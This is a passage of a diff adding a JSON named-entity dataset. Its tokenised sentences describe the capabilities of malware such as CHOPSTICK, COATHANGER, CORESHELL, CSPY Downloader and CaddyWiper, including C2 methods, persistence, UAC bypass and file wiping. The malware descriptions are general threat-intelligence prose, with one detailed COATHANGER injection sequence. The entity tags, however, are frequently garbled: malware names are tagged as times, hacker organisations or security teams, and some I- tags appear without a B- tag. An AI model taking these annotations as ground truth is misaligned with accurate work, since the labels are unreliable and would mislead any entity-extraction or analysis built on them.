"I-Features", + "O", + "O" + ] + }, + { + "tokens": [ + "Bundlore", + "will", + "enumerate", + "the", + "macOS", + "version", + "to", + "determine", + "which", + "follow-on", + "behaviors", + "to", + "execute", + "using", + "<code>/usr/bin/sw_vers", + "-productVersion</code>." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "B-SamFile" + ] + }, + { + "tokens": [ + "Bundlore", + "has", + "leveraged", + "/bin/sh", + "and", + "/bin/bash", + "to", + "execute", + "commands", + "on", + "the", + "victim", + "machine." + ], + "ner_tags": [ + "B-Time", + "O", + "B-Way", + "B-Way", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Bundlore", + "uses", + "HTTP", + "requests", + "for", + "C2." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "CALENDAR", + "malware", + "communicates", + "through", + "the", + "use", + "of", + "events", + "in", + "Google", + "Calendar." + ], + "ner_tags": [ + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "CALENDAR", + "has", + "a", + "command", + "to", + "run", + "cmd.exe", + "to", + "execute", + "commands." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "CARROTBALL", + "has", + "the", + "ability", + "to", + "use", + "FTP", + "in", + "C2", + "communications." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "CARROTBALL", + "has", + "the", + "ability", + "to", + "download", + "and", + "install", + "a", + "remote", + "payload." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "CARROTBALL", + "has", + "been", + "executed", + "through", + "users", + "being", + "lured", + "into", + "opening", + "malicious", + "e-mail", + "attachments." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "CARROTBALL", + "has", + "used", + "a", + "custom", + "base64", + "alphabet", + "to", + "decode", + "files." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "B-Tool", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "CARROTBAT", + "has", + "the", + "ability", + "to", + "execute", + "obfuscated", + "commands", + "on", + "the", + "infected", + "host." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "CARROTBAT", + "has", + "the", + "ability", + "to", + "download", + "a", + "base64", + "encoded", + "payload." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "CARROTBAT", + "has", + "the", + "ability", + "to", + "delete", + "downloaded", + "files", + "from", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "CARROTBAT", + "has", + "the", + "ability", + "to", + "download", + "and", + "execute", + "a", + "remote", + "file", + "via", + "certutil." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "B-Features", + "O", + "B-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "CARROTBAT", + "has", + "the", + "ability", + "to", + "determine", + "the", + "operating", + "system", + "of", + "the", + "compromised", + "host", + "and", + "whether", + "Windows", + "is", + "being", + "run", + "with", + "x86", + "or", + "x64", + "architecture." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "CARROTBAT", + "has", + "the", + "ability", + "to", + "execute", + "command", + "line", + "arguments", + "on", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "CCBkdr", + "was", + "added", + "to", + "a", + "legitimate,", + "signed", + "version", + "5.33", + "of", + "the", + "CCleaner", + "software", + "and", + "distributed", + "on", + "CCleaner's", + "distribution", + "site." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "CCBkdr", + "can", + "use", + "a", + "DGA", + "for", + "Fallback", + "Channels", + "if", + "communications", + "with", + "the", + "primary", + "command", + "and", + "control", + "server", + "are", + "lost." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "CHOPSTICK", + "encrypts", + "C2", + "communications", + "with", + "TLS." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "CHOPSTICK", + "is", + "capable", + "of", + "performing", + "remote", + "command", + "execution." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features" + ] + }, + { + "tokens": [ + "Part", + "of", + "APT28's", + "operation", + "involved", + "using", + "CHOPSTICK", + "modules", + "to", + "copy", + "itself", + "to", + "air-gapped", + "machines,", + "using", + "files", + "written", + "to", + "USB", + "sticks", + "to", + "transfer", + "data", + "and", + "command", + "traffic." + ], + "ner_tags": [ + "O", + "O", + "B-Idus", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Purp", + "I-Purp", + "O", + "I-Purp", + "O" + ] + }, + { + "tokens": [ + "CHOPSTICK", + "can", + "use", + "a", + "DGA", + "for", + "Fallback", + "Channels,", + "domains", + "are", + "generated", + "by", + "concatenating", + "words", + "from", + "lists." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "CHOPSTICK", + "can", + "switch", + "to", + "a", + "new", + "C2", + "channel", + "if", + "the", + "current", + "one", + "is", + "broken." + ], + "ner_tags": [ + "B-Way", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "An", + "older", + "version", + "of", + "CHOPSTICK", + "has", + "a", + "module", + "that", + "monitors", + "all", + "mounted", + "volumes", + "for", + "files", + "with", + "the", + "extensions", + ".doc,", + ".docx,", + ".pgp,", + ".gpg,", + ".m2f,", + "or", + ".m2o." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "B-SamFile", + "B-SamFile", + "B-SamFile", + "B-SamFile", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "CHOPSTICK", + "may", + "store", + "RC4", + "encrypted", + "configuration", + "information", + "in", + "the", + "Windows", + "Registry." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "CHOPSTICK", + "is", + "capable", + "of", + "performing", + "remote", + "file", + "transmission." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features" + ] + }, + { + "tokens": [ + "CHOPSTICK", + "used", + "a", + "proxy", + "server", + "between", + "victims", + "and", + "the", + "C2", + "server." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "CHOPSTICK", + "is", + "capable", + "of", + "performing", + "keylogging." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "B-HackOrg" + ] + }, + { + "tokens": [ + "Various", + "implementations", + "of", + "CHOPSTICK", + "communicate", + "with", + "C2", + "over", + "SMTP", + "and", + "POP3." + ], + "ner_tags": [ + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "CHOPSTICK", + "may", + "modify", + "Registry", + "keys", + "to", + "store", + "RC4", + "encrypted", + "configuration", + "information." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "CHOPSTICK", + "provides", + "access", + "to", + "the", + "Windows", + "Registry,", + "which", + "can", + "be", + "used", + "to", + "gather", + "information." + ], + "ner_tags": [ + "B-Way", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "Part", + "of", + "APT28's", + "operation", + "involved", + "using", + "CHOPSTICK", + "modules", + "to", + "copy", + "itself", + "to", + "air-gapped", + "machines", + "and", + "using", + "files", + "written", + "to", + "USB", + "sticks", + "to", + "transfer", + "data", + "and", + "command", + "traffic." + ], + "ner_tags": [ + "O", + "O", + "B-Idus", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Purp", + "I-Purp", + "O", + "I-Purp", + "O" + ] + }, + { + "tokens": [ + "CHOPSTICK", + "has", + "the", + "capability", + "to", + "capture", + "screenshots." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "I-Features", + "B-HackOrg" + ] + }, + { + "tokens": [ + "CHOPSTICK", + "checks", + "for", + "antivirus", + "and", + "forensics", + "software." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "CHOPSTICK", + "encrypts", + "C2", + "communications", + "with", + "RC4." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "CHOPSTICK", + "includes", + "runtime", + "checks", + "to", + "identify", + "an", + "analysis", + "environment", + "and", + "prevent", + "execution", + "on", + "it." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Various", + "implementations", + "of", + "CHOPSTICK", + "communicate", + "with", + "C2", + "over", + "HTTP." + ], + "ner_tags": [ + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "COATHANGER", + "connects", + "to", + "command", + "and", + "control", + "infrastructure", + "using", + "SSL." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "COATHANGER", + "decodes", + "configuration", + "items", + "from", + "a", + "bundled", + "file", + "for", + "command", + "and", + "control", + "activity." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "COATHANGER", + "copies", + "the", + "malicious", + "file", + "<code>/data2/.bd.key/preload.so</code>", + "to", + "<code>/lib/preload.so</code>,", + "then", + "launches", + "a", + "child", + "process", + "that", + "executes", + "the", + "malicious", + "file", + "<code>/data2/.bd.key/authd</code>", + "as", + "<code>/bin/authd</code>", + "with", + "the", + "arguments", + "<code>/lib/preload.so", + "reboot", + "newreboot", + "1</code>.", + "This", + "injects", + "the", + "malicious", + "preload.so", + "file", + "into", + "the", + "process", + "with", + "PID", + "1,", + "and", + "replaces", + "its", + "reboot", + "function", + "with", + "the", + "malicious", + "newreboot", + "function", + "for", + "persistence." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "COATHANGER", + "is", + "installed", + "following", + "exploitation", + "of", + "a", + "vulnerable", + "FortiGate", + "device." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "COATHANGER", + "removes", + "files", + "from", + "victim", + "environments", + "following", + "use", + "in", + "multiple", + "instances." + ], + "ner_tags": [ + "B-SamFile", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "COATHANGER", + "will", + "survey", + "the", + "contents", + "of", + "system", + "files", + "during", + "installation." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "COATHANGER", + "creates", + "and", + "installs", + "itself", + "to", + "a", + "hidden", + "installation", + "directory." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "COATHANGER", + "will", + "remove", + "and", + "write", + "malicious", + "shared", + "objects", + "associated", + "with", + "legitimate", + "system", + "functions", + "such", + "as", + "`read(2)`." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "COATHANGER", + "will", + "create", + "a", + "daemon", + "for", + "timed", + "check-ins", + "with", + "command", + "and", + "control", + "infrastructure." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "COATHANGER", + "will", + "set", + "the", + "GID", + "of", + "`httpsd`", + "to", + "90", + "when", + "infected." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "COATHANGER", + "uses", + "ICMP", + "for", + "transmitting", + "configuration", + "information", + "to", + "and", + "from", + "its", + "command", + "and", + "control", + "server." + ], + "ner_tags": [ + "B-Way", + "O", + "B-Way", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "COATHANGER", + "can", + "store", + "obfuscated", + "configuration", + "information", + "in", + "the", + "last", + "56", + "bytes", + "of", + "the", + "file", + "`/date/.bd.key/preload.so`." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "COATHANGER", + "will", + "query", + "running", + "process", + "information", + "to", + "determine", + "subsequent", + "program", + "execution", + "flow." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "COATHANGER", + "includes", + "a", + "binary", + "labeled", + "`authd`", + "that", + "can", + "inject", + "a", + "library", + "into", + "a", + "running", + "process", + "and", + "then", + "hook", + "an", + "existing", + "function", + "within", + "that", + "process", + "with", + "a", + "new", + "function", + "from", + "that", + "library." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "B-Features", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "COATHANGER", + "hooks", + "or", + "replaces", + "multiple", + "legitimate", + "processes", + "and", + "other", + "functions", + "on", + "victim", + "devices." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "I-Features", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "first", + "stage", + "of", + "COATHANGER", + "is", + "delivered", + "as", + "a", + "packed", + "file." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "COATHANGER", + "provides", + "a", + "BusyBox", + "reverse", + "shell", + "for", + "command", + "and", + "control." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "COATHANGER", + "uses", + "an", + "HTTP", + "GET", + "request", + "to", + "initialize", + "a", + "follow-on", + "TLS", + "tunnel", + "for", + "command", + "and", + "control." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "CORALDECK", + "has", + "created", + "password-protected", + "RAR,", + "WinImage,", + "and", + "zip", + "archives", + "to", + "be", + "exfiltrated." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "B-Tool", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "CORALDECK", + "has", + "exfiltrated", + "data", + "in", + "HTTP", + "POST", + "headers." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "CORALDECK", + "searches", + "for", + "specified", + "files." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "CORESHELL", + "contains", + "unused", + "machine", + "instructions", + "in", + "a", + "likely", + "attempt", + "to", + "hinder", + "analysis." + ], + "ner_tags": [ + "B-SamFile", + "I-Features", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "CORESHELL", + "downloads", + "another", + "dropper", + "from", + "its", + "C2", + "server." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "CORESHELL", + "can", + "communicate", + "over", + "SMTP", + "and", + "POP3", + "for", + "C2." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "B-Way", + "O", + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "CORESHELL", + "obfuscates", + "strings", + "using", + "a", + "custom", + "stream", + "cipher." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "I-Tool", + "I-Tool", + "O" + ] + }, + { + "tokens": [ + "CORESHELL", + "has", + "established", + "persistence", + "by", + "creating", + "autostart", + "extensibility", + "point", + "(ASEP)", + "Registry", + "entries", + "in", + "the", + "Run", + "key", + "and", + "other", + "Registry", + "keys,", + "as", + "well", + "as", + "by", + "creating", + "shortcuts", + "in", + "the", + "Internet", + "Explorer", + "Quick", + "Start", + "folder." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Way", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "CORESHELL", + "is", + "installed", + "via", + "execution", + "of", + "rundll32", + "with", + "an", + "export", + "named", + "\"init\"", + "or", + "\"InitW.\"" + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "CORESHELL", + "C2", + "messages", + "are", + "Base64-encoded." + ], + "ner_tags": [ + "B-SamFile", + "B-HackOrg", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "CORESHELL", + "C2", + "messages", + "are", + "encrypted", + "with", + "custom", + "stream", + "ciphers", + "using", + "six-byte", + "or", + "eight-byte", + "keys." + ], + "ner_tags": [ + "B-SamFile", + "B-HackOrg", + "O", + "O", + "O", + "O", + "B-Tool", + "O", + "O", + "O", + "B-Way", + "O", + "B-Way", + "B-Tool" + ] + }, + { + "tokens": [ + "CORESHELL", + "collects", + "hostname,", + "volume", + "serial", + "number", + "and", + "OS", + "version", + "data", + "from", + "the", + "victim", + "and", + "sends", + "the", + "information", + "to", + "its", + "C2", + "server." + ], + "ner_tags": [ + "B-SamFile", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "CORESHELL", + "can", + "communicate", + "over", + "HTTP", + "for", + "C2." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "CSPY", + "Downloader", + "can", + "bypass", + "UAC", + "using", + "the", + "SilentCleanup", + "task", + "to", + "execute", + "the", + "binary", + "with", + "elevated", + "privileges." + ], + "ner_tags": [ + "B-SamFile", + "B-SecTeam", + "O", + "I-Features", + "B-HackOrg", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "CSPY", + "Downloader", + "has", + "come", + "signed", + "with", + "revoked", + "certificates." + ], + "ner_tags": [ + "B-Idus", + "B-SecTeam", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "CSPY", + "Downloader", + "has", + "the", + "ability", + "to", + "self", + "delete." + ], + "ner_tags": [ + "B-SamFile", + "B-SecTeam", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "CSPY", + "Downloader", + "has", + "the", + "ability", + "to", + "remove", + "values", + "it", + "writes", + "to", + "the", + "Registry." + ], + "ner_tags": [ + "B-SamFile", + "B-SecTeam", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "B-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "CSPY", + "Downloader", + "can", + "download", + "additional", + "tools", + "to", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-SamFile", + "B-SecTeam", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "CSPY", + "Downloader", + "has", + "been", + "delivered", + "via", + "malicious", + "documents", + "with", + "embedded", + "macros." + ], + "ner_tags": [ + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "CSPY", + "Downloader", + "has", + "attempted", + "to", + "appear", + "as", + "a", + "legitimate", + "Windows", + "service", + "with", + "a", + "fake", + "description", + "claiming", + "it", + "is", + "used", + "to", + "support", + "packed", + "applications." + ], + "ner_tags": [ + "B-SamFile", + "B-SecTeam", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features" + ] + }, + { + "tokens": [ + "CSPY", + "Downloader", + "can", + "write", + "to", + "the", + "Registry", + "under", + "the", + "<code>%windir%</code>", + "variable", + "to", + "execute", + "tasks." + ], + "ner_tags": [ + "B-SamFile", + "B-SecTeam", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "CSPY", + "Downloader", + "can", + "use", + "the", + "schtasks", + "utility", + "to", + "bypass", + "UAC." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "CSPY", + "Downloader", + "has", + "been", + "packed", + "with", + "UPX." + ], + "ner_tags": [ + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "CSPY", + "Downloader", + "can", + "search", + "loaded", + "modules,", + "PEB", + "structure,", + "file", + "paths,", + "Registry", + "keys,", + "and", + "memory", + "to", + "determine", + "if", + "it", + "is", + "being", + "debugged", + "or", + "running", + "in", + "a", + "virtual", + "environment." + ], + "ner_tags": [ + "B-SamFile", + "B-SecTeam", + "O", + "I-Features", + "I-Features", + "O", + "B-Way", + "B-Features", + "I-Features", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "CSPY", + "Downloader", + "can", + "use", + "GET", + "requests", + "to", + "download", + "additional", + "payloads", + "from", + "C2." + ], + "ner_tags": [ + "B-SamFile", + "B-SecTeam", + "O", + "O", + "B-Features", + "B-Features", + "O", + "I-Features", + "I-Features", + "B-HackOrg", + "O", + "O" + ] + }, + { + "tokens": [ + "Cachedump", + "can", + "extract", + "cached", + "password", + "hashes", + "from", + "cache", + "entry", + "information." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "CaddyWiper", + "can", + "work", + "alphabetically", + "through", + "drives", + "on", + "a", + "compromised", + "system", + "to", + "take", + "ownership", + "of", + "and", + "overwrite", + "all", + "files." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O", + "B-SamFile", + "O", + "O" + ] + }, + { + "tokens": [ + "CaddyWiper", + "has", + "the", + "ability", + "to", + "destroy", + "information", + "about", + "a", + "physical", + "drive's", + "partitions", + "including", + "the", + "MBR,", + "GPT,", + "and", + "partition", + "entries." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Tool", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "CaddyWiper", + "can", + "enumerate", + "all", + "files", + "and", + "directories", + "on", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "CaddyWiper", + "has", + "the", + "ability", + "to", + "dynamically", + "resolve", + "and", + "use", + "APIs,", + "including", + "`SeTakeOwnershipPrivilege`." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "CaddyWiper", + "can", + "obtain", + "a", + "list", + "of", + "current", + "processes." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "CaddyWiper", + "can", + "use", + "`DsRoleGetPrimaryDomainInformation`", + "to", + "determine", + "the", + "role", + "of", + "the", + "infected", + "machine.", + "CaddyWiper", + "can", + "also", + "halt", + "execution", + "if", + "the", + "compromised", + "host", + "is", + "identified", + "as", + "a", + "domain", + "controller." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "CaddyWiper", + "can", + "modify", + "ACL", + "entries", + "to", + "take", + "ownership", + "of", + "files." + ], + "ner_tags": [ + "B-Idus", + "O", + "I-Features", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O" + ] + }, + { + "tokens": [ + "Cadelspy", + "has", + "the", + "ability", + "to", + "identify", + "open", + "windows", + "on", + "the", + "compromised", + "host." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "B-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Cadelspy", + "has", + "the", + "ability", + "to", + "compress", + "stolen", + "data", + "into", + "a", + ".cab", + "file." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "Cadelspy", + "has", + "the", + "ability", + "to", + "record", + "audio", + "from", + "the", + "compromised", + "host." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Cadelspy", + "has", + "the", + "ability", + "to", + "steal", + "data", + "from", + "the", + "clipboard." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "I-Purp", + "I-Purp", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Cadelspy", + "has", + "the", + "ability", + "to", + "log", + "keystrokes", + "on", + "the", + "compromised", + "host." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "I-Purp", + "I-Purp", + "O", + "O", + 